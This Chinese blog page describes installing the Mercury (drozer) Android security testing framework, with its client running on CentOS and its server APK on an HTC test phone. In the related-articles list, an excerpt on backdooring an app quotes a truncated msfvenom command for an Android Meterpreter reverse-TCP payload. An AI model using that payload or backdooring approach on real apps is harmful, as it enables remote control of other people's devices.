android 安全评估框架Mercury (1) 安装

最新推荐文章于 2023-05-13 12:06:58 发布
最新推荐文章于 2023-05-13 12:06:58 发布
阅读量657 收藏
点赞数
分类专栏: android linux 文章标签: android Mercury android assessment framework Mercury
Mercury 由两部分组成,分别运行与PC和Android设备上。下图是一个简单的通信概述图:

[img]http://dl.iteye.com/upload/attachment/0073/7722/7a60dc79-f8db-3e87-a4ba-2d92fb48896f.png[/img]


安装 client 的时候必须要python2.7.x版本。否则会报一个hashlib错误。开始还给command.py加try :cry: ……诶,码畜当惯了,一看到error就开始翻代码 


# python2.7 mercury.py


运行在centos上的client端

[img]http://dl.iteye.com/upload/attachment/0073/5294/2672a780-52d1-335c-bb41-e8da6f0c82a2.png[/img]
这里是用IP直接连接到测试的机器上。

模块:
[img]http://dl.iteye.com/upload/attachment/0073/5296/2c654d96-3cc4-31e3-a3a7-6f18ed726418.png[/img]


测试机器 一台htc Android,4.0.3 target15 安装mercury-server.apk,然后运行:
[img]http://dl.iteye.com/upload/attachment/0073/5300/be29d783-76e7-3697-a6ba-d208bee1894c.png[/img]

……又是跟豌豆荚有冲突的主,为了截图重新装了豌豆,因为wandoujia_deamon.exe 占用 adb.exe 所以一直没有豌豆荚在电脑上。 :roll:

client端的代码写的很清晰,有空再仔细分析。

github: https://github.com/mwrlabs/mercury

用户手册:http://labs.mwrinfosecurity.com/assets/300/mercury-user-guide-v1.1.pdf
下周继续……
iteye_14837
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mercury android平台安全评估框架软件
05-30
mercury android平台安全评估框架软件
非常详细Qt on Android中图文解释Hello World全过程
foxgod的专栏
06-05 801
关于Qt的基础知识,本文简单做下介绍,Qt 是一个跨平台C++图形用户界面应用程序开发框架,它既可以开发GUI程序,也可用于开发非GUI程序,它也是面向对象的框架,使用特殊的代码生成扩展以及一些宏,允许组件编程。 现在我将从实践出发,带领大家一步一步完成在Android上的第一个 Qt 应用: Hello Qt on Android 。应用本身非常简单(仅仅是在屏幕上显示一...
Mercury为高性能计算启用远程过程调用(RPC)
ssbandjl的博客
05-13 293
​ 远程过程调用(RPC)是分布式服务广泛使用的一种技术。这种技术现在越来越多地用于高性能计算 (HPC) 的上下文中,它允许将例程的执行委托给远程节点,这些节点可以留出并专用于特定任务。然而,现有的 RPC 框架采用基于套接字的网络接口(通常在 TCP/IP 之上),这不适合 HPC 系统,因为此 API 通常不能很好地映射到这些系统上使用的本机网络传输,从而导致网络性能较低。此外,现有的 RPC 框架通常不支持处理大数据参数,例如在读取或写入调用中发现的参数。
高性能网络通信框架--Mercury
cyq6239075的博客
09-07 1534
Mercury是一个专门设计用于HPC系统的RPC框架,允许异步传输参数和执行请求,以及直接支持大型数据参数
Android 安全评估整改办法一
tianshukebi的博客
11-29 807
项目已接近尾声,应要求进行应用评估,本人将近期评估接触到的方法和大家分享。 内网信息 漏洞说明 应用代码中如果存在内网信息泄漏,一旦被攻击者利用,则会对服务器安全产生威胁。 分析方案 (1)首先检测源代码是否加密; (2)扫描反编译代码中以http、https开头的字符串以及IP地址 删除非应用需要
drozer-agent:Mercury安全评估框架Android代理
02-02
drozer(以前为Mercury)是Android的领先安全测试框架。 drozer允许您通过承担应用程序的角色并与Dalvik VM,其他应用程序的IPC端点和基础操作系统进行交互来搜索应用程序和设备中的安全漏洞。 drozer提供了可帮助...
水星路由器怎么安装Mercury无线路由器安装示意图解
10-01
对于初次使用路由器的朋友们都会想要知道路由器应该怎么安装使用呢?针对此问题,本文就为大家以Mercury水星无线路由器为例,介绍无线路由器在有猫和无猫情况下的安装方法,有兴趣的朋友们可以看看本文哦
mercury路由器_mercury路由器安装说明.pdf
10-30
Mercury路由器是一款常见的家用无线路由器...通过遵循这些步骤,你可以顺利地安装和配置Mercury MW150R路由器,享受到稳定且安全的网络服务。如果有任何问题,查阅路由器的用户手册或者联系Mercury的客户服务获取帮助。
Android软件安全与逆向分析用到的工具
05-06
包含以下文件 AndBug-master.zip androguard-1.6.tar.gz AntiLVL-1.4.0-linux.zip AntiLVL-1.4.0-win.zip ...mercury-v1.1.zip Notepad++.zip signapk.zip smali.jar tcpdump Wireshark-win32-1.8.2.exe --拿掉了
java反编译工具_JAVA反编译工具集锦
weixin_39921689的博客
11-14 75
Procyon作者:Mike Strobel2015年更新。处理Java 5及更高版本(包括Java 8)的语言增强功能,包括:Enum声明Enum和String switch语句本地类(匿名和命名)注释Java 8 Lambdas和方法引用(即::运算符)。 Java 7需要运行。CFR作者:Lee Benfield更新于2015年.CFR能够反编译现代Java功能 - Java 8 lambd...
android反编译工具全套(apktool、Android逆向助手、jd-gui)
01-30
反编译三部曲: 1.apk-->项目结构:通过apktool反编译将整个apk解压成完整的项目结构 2.apk->dex: 通过Android逆向助手将apk反编译成dex 3.dex->jar:通过Android逆向助手将dex反编译成jar 4.jar>查看代码,通过jd-gui查看jar包源码,并可导出源码。
Mercury:一种基于wanandroid.com开放API接口的android应用程序的应用程序。 ,应用层进行了封装,可作为快速开发android应用的框架
02-14
汞 基于一款开放API接口的Android应用应用。Kotlin语言开发,采用了组件化开发,单活动+多fragement,MVVM架构的改造+协程+ LiveData +数据绑定编程思想,对数据层,传输层,应用层进行了封装,可作为快速开发android应用的框架。 架构介绍 1,组件化应用结构 采用组件化结构体系,将功能组件撤出,插入架构最收缩,作为工具类组件;将业务模块解压缩,各个业务模块可以独立开发调试​​,组件间路由通过ARouter实现;应用层只包含最简单的UI或者完全是一个壳工程(根据项目情况而定)。可以使项目结构清晰,各个模块之间完全解压缩,提高开发效率。 本项目的组件层次介绍: 功能组件层: 提供开发应用程序的基础功能,这些基本功能独立于业务组件,可以被业务组件调用。 lib_common:提供和业务逻辑无关的基本功能,例如打印日志,IO操作,网络/设备检测,数据加解密等。
mercury-playground:使用 Mercury 框架的测试项目
07-04
水星游乐场 与 Mercury 混在一起的测试项目 跑步 必需:NodeJS,Browserify ./setup.sh 安装使用的库 ./build.sh 创建 Javascript 包 ./run.sh 在上启动 Python HTTP 服务器
mercury-agent-2.2.0.apk
05-30
mercury-agent-2.2.0.apk,mercury的手机agent端
AndroidKiller介绍与使用
YJJYXM的博客
09-25 8291
往期推荐 什么是虚拟机?虚拟机有那几种 APK安装流程及详细步骤 APK打包流程 APK文件结构 Android开发之数据储存 APK属于压缩文件,不可以通过直接解压的方式来获取明文内容,需要借助AndroidKiller这类的第三方的工具。 1.1 AndroidKiller介绍、环境配置 AndroidKiller是一款经常用来反编译APK的工具。 1.“AndroidKiller”的文件夹目录结构,如图1.1所示,双击打开“AndroidKiller.exe”文件,此时,会弹出一个窗口,如图1.2所
android反编译工具mercury,手动给APP添加backdoor(msf)
weixin_39600510的博客
05-26 536
本示例仅为学习研究所用,使用请准守《网络安全法》。造成一切后果,自行承担。本站不但任何责任!!!前期的准备某路由器管理APP(luyou.apk)kali Linux手机(android 10)01 生成Android shell在生成之前,确定本机的ip地址。msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=...
几款android安全测试工具
潇湘淑女
04-25 6029
1.dexexplore 该应用可以直接查看android 应用的dex 文件,及其方便使用,可以帮助我们审计android源码的安全问题和掌握一些基本信息(四大组件等) 链接:http://pan.baidu.com/s/1c2eFUk4 密码:fh9h 2.zANTI zAnti – 用于中间人攻击(MITM)测试时可进行人工渗透测试,ICMP重定向 – 使用ICMP重定向
四大组件安全
九天
11-30 3027
本文为学习记录,将一些重点记录下。参考droidsec网站。推荐大家关注一下。 Activity:http://www.droidsec.cn/android-activtity-security/ Broadcast:http://www.droidsec.cn/android-broadcast-security/ Content:http://www.droidsec.cn/a
Android App渗透测试工具drozer,Qark,Androguard
weixin_30594001的博客
02-26 658
一. drozer简介 drozer(以前称为Mercury)是一款Android安全测试框架。 drozer允许您通过承担应用程序的角色并与Dalvik VM,其他应用程序的IPC端点和底层操作系统进行交互来搜索应用程序和设备中的安全漏洞。 drozer提供工具来帮助您使用,共享和理解公共Android漏洞。它可以帮助您通过开发或社会工程将drozer Agent部署到设备。...
junit Mercury
最新发布
05-17
JUnit Mercury 是一个Java测试框架,它是JUnit5的一部分,旨在提供额外的测试功能和扩展。它支持动态测试,参数化测试以及自定义扩展。JUnit Mercury 还提供了JUnit Platform Launcher API,可用于在不同的环境中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值